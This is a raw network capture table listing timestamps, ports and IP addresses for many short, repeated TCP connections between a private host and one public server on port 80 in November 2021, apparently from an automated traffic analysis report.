Nov 25, 2021 10:48:20.353235006 CET	80	49864	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:20.353384018 CET	49864	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:20.354984999 CET	49864	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:20.388293982 CET	80	49864	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:20.388570070 CET	49864	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:20.421787977 CET	80	49864	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:20.438185930 CET	80	49864	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:20.438199997 CET	80	49864	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:20.438441992 CET	49864	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:20.438456059 CET	49864	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:20.471721888 CET	80	49864	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.002243996 CET	49865	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.036319971 CET	80	49865	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.036617041 CET	49865	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.038147926 CET	49865	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.072262049 CET	80	49865	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.072483063 CET	49865	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.106688023 CET	80	49865	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.125472069 CET	80	49865	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.125536919 CET	80	49865	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.125731945 CET	49865	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.125824928 CET	49865	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.160036087 CET	80	49865	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.730025053 CET	49866	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.763473988 CET	80	49866	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.763731003 CET	49866	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.765352011 CET	49866	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.798700094 CET	80	49866	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.798989058 CET	49866	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.832267046 CET	80	49866	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.848124981 CET	80	49866	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.848175049 CET	80	49866	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:21.848367929 CET	49866	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.848423958 CET	49866	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:21.881896019 CET	80	49866	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:22.429327965 CET	49867	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:22.463098049 CET	80	49867	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:22.463284016 CET	49867	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:22.464833975 CET	49867	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:22.498703957 CET	80	49867	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:22.498878956 CET	49867	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:22.533019066 CET	80	49867	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:22.549273968 CET	80	49867	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:22.549341917 CET	80	49867	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:22.549632072 CET	49867	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:22.549730062 CET	49867	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:22.583853960 CET	80	49867	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.095052958 CET	49869	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.128371000 CET	80	49869	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.128602982 CET	49869	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.130212069 CET	49869	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.163573980 CET	80	49869	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.163805008 CET	49869	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.197176933 CET	80	49869	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.214514017 CET	80	49869	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.214562893 CET	80	49869	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.214818001 CET	49869	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.214873075 CET	49869	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.248348951 CET	80	49869	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.690898895 CET	49870	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.725095987 CET	80	49870	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.725290060 CET	49870	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.726845980 CET	49870	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.760822058 CET	80	49870	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.761006117 CET	49870	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.795145988 CET	80	49870	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.811579943 CET	80	49870	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.811645985 CET	80	49870	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:23.811938047 CET	49870	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.812035084 CET	49870	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:23.846333027 CET	80	49870	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:24.378262043 CET	49871	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:24.411689997 CET	80	49871	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:24.411976099 CET	49871	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:24.413482904 CET	49871	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:24.446791887 CET	80	49871	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:24.446990013 CET	49871	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:24.480350018 CET	80	49871	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:24.498095989 CET	80	49871	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:24.498145103 CET	80	49871	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:24.498382092 CET	49871	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:24.498431921 CET	49871	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:24.532057047 CET	80	49871	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.044353008 CET	49872	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.078480005 CET	80	49872	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.078694105 CET	49872	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.080255032 CET	49872	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.114427090 CET	80	49872	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.114614964 CET	49872	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.148745060 CET	80	49872	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.168153048 CET	80	49872	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.168219090 CET	80	49872	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.168394089 CET	49872	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.168457985 CET	49872	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.202707052 CET	80	49872	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.745574951 CET	49873	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.778976917 CET	80	49873	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.779320002 CET	49873	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.780947924 CET	49873	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.814291000 CET	80	49873	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.814433098 CET	49873	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.848272085 CET	80	49873	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.867208958 CET	80	49873	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.867244959 CET	80	49873	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:25.867527008 CET	49873	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.867587090 CET	49873	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:25.900876045 CET	80	49873	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:26.376907110 CET	49874	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:26.410856009 CET	80	49874	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:26.411382914 CET	49874	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:26.412909985 CET	49874	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:26.446697950 CET	80	49874	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:26.446912050 CET	49874	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:26.480688095 CET	80	49874	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:26.499762058 CET	80	49874	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:26.499828100 CET	80	49874	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:26.500040054 CET	49874	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:26.500092983 CET	49874	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:26.534043074 CET	80	49874	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.047266006 CET	49875	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.081378937 CET	80	49875	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.081640959 CET	49875	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.083163977 CET	49875	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.117276907 CET	80	49875	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.117561102 CET	49875	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.151582003 CET	80	49875	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.176875114 CET	80	49875	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.176930904 CET	80	49875	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.177301884 CET	49875	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.177386045 CET	49875	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.211680889 CET	80	49875	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.658446074 CET	49876	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.691744089 CET	80	49876	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.691930056 CET	49876	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.693461895 CET	49876	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.726810932 CET	80	49876	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.727015018 CET	49876	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.760294914 CET	80	49876	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.784121037 CET	80	49876	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.784177065 CET	80	49876	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:27.784459114 CET	49876	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.784540892 CET	49876	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:27.818201065 CET	80	49876	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.238115072 CET	49877	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.272106886 CET	80	49877	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.272254944 CET	49877	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.273850918 CET	49877	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.307915926 CET	80	49877	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.308095932 CET	49877	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.342250109 CET	80	49877	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.358525038 CET	80	49877	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.358581066 CET	80	49877	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.358824968 CET	49877	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.358889103 CET	49877	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.393079042 CET	80	49877	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.823672056 CET	49878	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.856802940 CET	80	49878	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.856914043 CET	49878	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.858505011 CET	49878	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.891932964 CET	80	49878	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.892165899 CET	49878	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.925327063 CET	80	49878	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.941189051 CET	80	49878	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.941236973 CET	80	49878	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:28.941387892 CET	49878	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.941436052 CET	49878	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:28.974637985 CET	80	49878	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.401098967 CET	49879	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.434408903 CET	80	49879	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.434748888 CET	49879	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.436238050 CET	49879	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.469357014 CET	80	49879	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.469530106 CET	49879	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.502717972 CET	80	49879	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.519896030 CET	80	49879	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.519922972 CET	80	49879	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.520132065 CET	49879	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.520154953 CET	49879	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.553476095 CET	80	49879	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.920804024 CET	49880	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.954997063 CET	80	49880	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.955240965 CET	49880	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.956862926 CET	49880	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:29.990829945 CET	80	49880	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:29.991008997 CET	49880	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.025326014 CET	80	49880	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.042423010 CET	80	49880	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.042478085 CET	80	49880	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.042629004 CET	49880	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.042695999 CET	49880	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.077055931 CET	80	49880	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.582386971 CET	49881	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.616730928 CET	80	49881	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.616981030 CET	49881	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.618581057 CET	49881	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.652554989 CET	80	49881	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.652806044 CET	49881	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.687401056 CET	80	49881	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.704024076 CET	80	49881	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.704090118 CET	80	49881	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:30.704283953 CET	49881	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.704380035 CET	49881	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:30.738753080 CET	80	49881	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.195472002 CET	49882	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.229465008 CET	80	49882	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.229696035 CET	49882	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.231230021 CET	49882	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.265162945 CET	80	49882	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.265408039 CET	49882	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.299580097 CET	80	49882	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.317507029 CET	80	49882	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.317562103 CET	80	49882	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.317708015 CET	49882	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.317790985 CET	49882	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.352082014 CET	80	49882	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.796892881 CET	49883	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.830260038 CET	80	49883	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.830409050 CET	49883	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.831959963 CET	49883	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.865200043 CET	80	49883	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.865540028 CET	49883	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.898873091 CET	80	49883	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.919064045 CET	80	49883	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.919137955 CET	80	49883	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:31.919295073 CET	49883	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.919353962 CET	49883	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:31.952649117 CET	80	49883	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:32.400449038 CET	49884	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:32.433923960 CET	80	49884	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:32.434089899 CET	49884	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:32.435657024 CET	49884	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:32.469024897 CET	80	49884	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:32.469261885 CET	49884	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:32.502676010 CET	80	49884	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:32.519407034 CET	80	49884	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:32.519459963 CET	80	49884	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:32.519644022 CET	49884	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:32.519696951 CET	49884	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:32.553145885 CET	80	49884	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.052558899 CET	49885	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.086685896 CET	80	49885	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.086937904 CET	49885	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.088495016 CET	49885	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.122658014 CET	80	49885	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.122982025 CET	49885	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.157277107 CET	80	49885	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.174014091 CET	80	49885	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.174073935 CET	80	49885	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.174274921 CET	49885	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.174338102 CET	49885	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.208494902 CET	80	49885	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.704761028 CET	49886	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.738205910 CET	80	49886	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.738404036 CET	49886	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.744999886 CET	49886	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.778490067 CET	80	49886	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.778672934 CET	49886	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.812690020 CET	80	49886	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.827759027 CET	80	49886	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.827847958 CET	80	49886	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:33.828154087 CET	49886	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.828253031 CET	49886	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:33.861989975 CET	80	49886	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.307369947 CET	49887	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.341396093 CET	80	49887	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.341675997 CET	49887	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.343229055 CET	49887	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.377239943 CET	80	49887	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.377456903 CET	49887	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.411616087 CET	80	49887	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.427978992 CET	80	49887	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.428033113 CET	80	49887	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.428205967 CET	49887	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.428263903 CET	49887	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.462404966 CET	80	49887	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.906017065 CET	49888	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.939934015 CET	80	49888	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.940124035 CET	49888	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.941843033 CET	49888	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:34.975893974 CET	80	49888	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:34.976138115 CET	49888	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.010236979 CET	80	49888	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.026457071 CET	80	49888	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.026510000 CET	80	49888	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.026653051 CET	49888	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.026706934 CET	49888	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.060794115 CET	80	49888	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.506908894 CET	49889	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.540335894 CET	80	49889	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.540621996 CET	49889	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.542264938 CET	49889	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.575679064 CET	80	49889	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.575865030 CET	49889	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.609325886 CET	80	49889	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.624941111 CET	80	49889	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.624991894 CET	80	49889	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:35.625134945 CET	49889	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.625186920 CET	49889	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:35.658628941 CET	80	49889	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.168749094 CET	49890	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.202838898 CET	80	49890	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.203123093 CET	49890	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.204633951 CET	49890	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.238612890 CET	80	49890	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.238786936 CET	49890	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.272787094 CET	80	49890	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.296611071 CET	80	49890	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.296659946 CET	80	49890	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.296904087 CET	49890	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.296952963 CET	49890	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.331033945 CET	80	49890	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.785676003 CET	49891	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.819159985 CET	80	49891	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.819339991 CET	49891	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.820807934 CET	49891	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.854130030 CET	80	49891	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.854347944 CET	49891	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.887676954 CET	80	49891	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.904438019 CET	80	49891	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.904485941 CET	80	49891	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:36.904650927 CET	49891	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.904699087 CET	49891	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:36.938328028 CET	80	49891	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.434149981 CET	49892	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:37.468044043 CET	80	49892	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.468225956 CET	49892	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:37.469780922 CET	49892	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:37.503554106 CET	80	49892	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.503727913 CET	49892	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:37.537578106 CET	80	49892	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.553401947 CET	80	49892	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.553450108 CET	80	49892	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.553641081 CET	49892	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:37.553689003 CET	49892	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:37.587584972 CET	80	49892	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:37.970103025 CET	49893	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.003257990 CET	80	49893	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:38.003495932 CET	49893	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.005112886 CET	49893	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:38.038175106 CET	80	49893	176.223.209.128	192.168.11.20
